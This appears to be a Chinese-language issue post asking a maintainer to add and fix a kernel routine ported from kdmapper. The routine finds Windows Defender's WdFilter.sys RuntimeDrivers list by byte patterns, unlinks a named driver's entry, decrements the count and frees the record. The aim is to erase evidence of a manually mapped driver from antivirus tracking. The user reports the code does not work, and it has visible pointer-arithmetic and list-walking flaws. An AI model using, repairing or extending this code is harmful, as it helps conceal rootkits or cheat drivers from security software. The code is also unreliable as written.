能加入clear_wdfilter_driver_list吗?
可以增加清理wdfilter.sys中的runtimeDrivers
以下是我从 kdmapper 移植到内核的代码
`bool clear_wd_filter_driver_list(const wchar_t* name) { DbgBreakPoint(); ULONG WdFilterSize = 0; auto WdFilter = (ULONG64)GetSystemModuleBase(L"WdFilter.sys", &WdFilterSize); if (WdFilter == 0) return false;
auto RuntimeDriversList = (ULONG64)FindPattern_Wrapper((PUCHAR)WdFilter, WdFilterSize, "48 8B 0D ? ? ? ? FF 05"); if (!RuntimeDriversList) return false;
auto RuntimeDriversCountRef = (ULONG64)FindPattern_Wrapper((PUCHAR)WdFilter, WdFilterSize, "FF 05 ? ? ? ? 48 39 11"); if (!RuntimeDriversCountRef) return false;
auto MpFreeDriverInfoExRef = (ULONG64)FindPattern_Wrapper((PUCHAR)WdFilter, WdFilterSize, "49 8B C9 ? 89 ? 08 E8 ? ? ? ? ? ? ? ? ? ? ? E9"); if (!MpFreeDriverInfoExRef) { MpFreeDriverInfoExRef = (ULONG64)FindPattern_Wrapper((PUCHAR)WdFilter, WdFilterSize, "48 89 4A ? 49 8B ? E8 ? ? ? ? ? ? ? ? ? ? ? E9"); if (!MpFreeDriverInfoExRef) return false; }
MpFreeDriverInfoExRef += 0x7; // skip until call instruction
RuntimeDriversList = (ULONG64)ResolveRelativeAddress((LPBYTE)RuntimeDriversList, 3); ULONG64 RuntimeDriversList_Head = RuntimeDriversList - 0x8; ULONG64 RuntimeDriversCount = (ULONG64)ResolveRelativeAddress((LPBYTE)RuntimeDriversCountRef, 2); ULONG64 RuntimeDriversArray = RuntimeDriversCount + 0x8; RuntimeDriversArray = (ULONG64)RuntimeDriversArray; ULONG64 MpFreeDriverInfoEx = (ULONG64)ResolveRelativeAddress((LPBYTE)MpFreeDriverInfoExRef, 1);
for (PLIST_ENTRY Entry = (PLIST_ENTRY)(RuntimeDriversList_Head); Entry != (LIST_ENTRY*)RuntimeDriversList_Head; Entry = Entry->Flink) { //PUNICODE_STRING Unicode_String = (PUNICODE_STRING)((ULONG64)Entry + 0x10); UNICODE_STRING Unicode_String = (UNICODE_STRING)(Entry + 0x10); if (MmIsAddressValid(Unicode_String.Buffer)) { LogInfo(0, "Found Driver: %ws", Unicode_String.Buffer); if (wcsstr(name, Unicode_String.Buffer)) {
//remove from RuntimeDriversArray
bool removedRuntimeDriversArray = false;
PVOID SameIndexList = (PVOID)((ULONG64)Entry - 0x10);
for (int k = 0; k < 256; k++) { // max RuntimeDriversArray elements
PVOID value = *(PVOID*)(RuntimeDriversArray + (k * 8));
if (value == SameIndexList) {
PVOID emptyval = (PVOID)(RuntimeDriversCount + 1); // this is not count+1 is position of cout addr+1
*(PVOID*)(RuntimeDriversArray + (k * 8)) = emptyval;
removedRuntimeDriversArray = true;
break;
}
}
if (!removedRuntimeDriversArray) return false;
auto NextEntry = Entry->Flink;
auto PrevEntry = Entry->Blink;
NextEntry->Blink = PrevEntry;
PrevEntry->Flink = NextEntry;
// decrement RuntimeDriversCount
*(ULONG*)RuntimeDriversCount = *(ULONG*)RuntimeDriversCount - 1;
// call MpFreeDriverInfoEx
ULONG64 DriverInfo = (ULONG64)Entry - 0x20;
//verify DriverInfo Magic
USHORT Magic = *(USHORT*)DriverInfo;
if (Magic != 0xDA18) {
//Log("[!] DriverInfo Magic is invalid, new wdfilter version?, driver info will not be released to prevent bsod" << std::endl);
}
else {
using MpFreeDriverInfoExFn = void(__fastcall*)(ULONG64);
MpFreeDriverInfoExFn MpFreeDriverInfoEx_ = (MpFreeDriverInfoExFn)MpFreeDriverInfoEx;
MpFreeDriverInfoEx_(DriverInfo);
}
//LogInfo(0, "WdFilterDriverList Cleaned: %s\n", Unicode_String.Buffer);
return true;
}
}
}`
这也许可以节省一些时间，但是存在一些问题：无法在链表中找到与已加载驱动名称匹配的项。
R3原版代码:https://github.com/TheCruZ/kdmapper/blob/master/kdmapper/intel_driver.cpp#L114
您有时间的话可以看一下，顺便升级这份内核清理痕迹的代码。我水平有限，不知道问题出在哪。